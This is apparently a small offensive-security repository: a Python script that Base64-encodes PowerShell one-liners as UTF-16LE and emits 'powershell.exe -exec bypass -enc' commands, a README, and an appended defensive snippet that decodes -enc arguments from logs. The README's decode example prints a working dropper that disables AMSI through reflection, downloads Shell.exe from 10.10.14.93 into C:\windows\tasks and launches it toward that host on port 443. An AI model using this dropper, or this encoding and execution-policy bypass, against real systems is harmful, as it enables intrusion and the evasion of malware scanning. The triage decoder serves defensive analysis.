├── ps-encoder.py
└── README.md


/ps-encoder.py:
--------------------------------------------------------------------------------
import sys, base64

# Show usage when arguments are missing or help is requested.
if len(sys.argv) < 3 or sys.argv[1] == "-h" or sys.argv[1] == "--help":
    print("Usage: " + sys.argv[0] + " [OPTION]... [FILE]")
    print("PowerShell Base64 encode or decode FILE, or standard input, to standard output.")
    print("\nWith no FILE provided as the second argument, the second argument will be encoded or decoded\n")
    print(" -d, --decode".ljust(20, " ") + "decode the powershell FILE or argument.")
    print(" -e, --encode".ljust(20, " ") + "encode the powershell FILE or argument.")
    print(" -h, --help".ljust(20, " ") + "display this help and exit.")
    print("\n If you want to output to a file use the stdout > operator.\n")
    sys.exit()

# Treat the second argument as a file path; if it cannot be opened, use it as the literal input.
try:
    with open(sys.argv[2], "r") as f:
        ps = f.read()
except OSError:
    ps = sys.argv[2]

if sys.argv[1] == "-e" or sys.argv[1] == "--encode":
    # PowerShell's -enc expects Base64 over the UTF-16LE bytes of the command.
    data = ps.encode('utf-16-le')
    b64 = base64.b64encode(data)
    print("powershell.exe -exec bypass -enc " + b64.decode())

elif sys.argv[1] == "-d" or sys.argv[1] == "--decode":
    # Reverse the two layers: Base64 first, then UTF-16LE.
    b64 = base64.b64decode(ps)
    script = b64.decode('utf-16-le')
    print(script)

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# PowerShell Encoder
A very simple Python script to encode and decode PowerShell one-liners.

I used [Raikia's PowerShell encoder](https://raikia.com/tool-powershell-encoder/) a lot, but one day it went down, and I was sad! So I created this simple script that I could run on Linux.

For anybody who doesn't know: PowerShell doesn't just use Base64, it uses Base64 over the UTF-16LE bytes of the command.

## Usage

Show the help:

```
./ps-encoder.py
Usage: ./ps-encoder.py [OPTION]... [FILE]
PowerShell Base64 encode or decode FILE, or standard input, to standard output.

With no FILE provided as the second argument, the second argument will be encoded or decoded

 -d, --decode       decode the powershell FILE or argument.
 -e, --encode       encode the powershell FILE or argument.
 -h, --help         display this help and exit.

 If you want to output to a file use the stdout > operator.
```

## Examples

### Encode

Encode a PowerShell dropper file:

```
./ps-encoder.py -e dropper.txt
powershell.exe -exec bypass -enc <base64-encoded command>
```

To file:

```
./ps-encoder.py -e dropper.txt > encoded-dropper.txt
```

### Decode

Decode a PowerShell dropper:

```
./ps-encoder.py -d <base64-encoded command>
$a = [Ref].Assembly.GetTypes();ForEach($b in $a) {if ($b.Name -like "*iutils") {$c = $b}};$d = $c.GetFields('NonPublic,Static');ForEach($e in $d) {if ($e.Name -like "*itFailed") {$f = $e}};$f.SetValue($null,$true);
(new-object system.net.webclient).downloadfile("http://10.10.14.93/Shell.exe", "C:\windows\tasks\Shell.exe");
Start-Process -FilePath "C:\Windows\Tasks\Shell.exe" -ArgumentList "10.10.14.93 443";
```

To file:

```
./ps-encoder.py -d encoded-dropper.txt > dropper.txt
```

--------------------------------------------------------------------------------
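Added example, not part of this repository: the decode path applied to triage, pulling the `-enc` argument out of a logged process command line and reversing the Base64 and UTF-16LE layers. The function names and the sample command lines are constructed for illustration; the short-flag handling assumes powershell.exe's acceptance of `-ec` and of prefixes of `-EncodedCommand`.

```python
import base64
import binascii
import re

# A "-flag value" or "/flag value" pair inside a process command line.
FLAG_VALUE = re.compile(r"(?:^|\s)[-/](\w+)\s+[\"']?([A-Za-z0-9+/=]+)")


def is_encoded_flag(flag):
    """True for -EncodedCommand and the short forms powershell.exe accepts."""
    flag = flag.lower()
    return flag == "ec" or "encodedcommand".startswith(flag)


def decode_encoded_command(cmdline):
    """Return the script carried by -enc in cmdline, or None if absent or invalid."""
    for flag, value in FLAG_VALUE.findall(cmdline):
        if not is_encoded_flag(flag):
            continue  # e.g. "-exec bypass" is ExecutionPolicy, not an encoded command
        value += "=" * (-len(value) % 4)  # tolerate missing '=' padding
        try:
            # Base64 first, then UTF-16LE: the two layers ps-encoder.py applies.
            return base64.b64decode(value, validate=True).decode("utf-16-le")
        except (binascii.Error, UnicodeDecodeError):
            return None  # not Base64, or an odd byte count that is not UTF-16LE
    return None


if __name__ == "__main__":
    # Constructed sample command lines (not taken from the page).
    enc = base64.b64encode("Get-Date".encode("utf-16-le")).decode()
    samples = [
        f"powershell.exe -exec bypass -enc {enc}",
        f"powershell -NoProfile -EncodedCommand {enc.rstrip('=')}",
        "powershell.exe -enc ZGly",          # Base64 of UTF-8 "dir": rejected
        "powershell.exe -File report.ps1",   # no encoded command
    ]
    for line in samples:
        print(f"{decode_encoded_command(line)!r:12} <- {line}")
```

An even-length UTF-8 payload still decodes without error but yields unrelated characters, so a `None` result is not the only sign that the wrong text encoding was used.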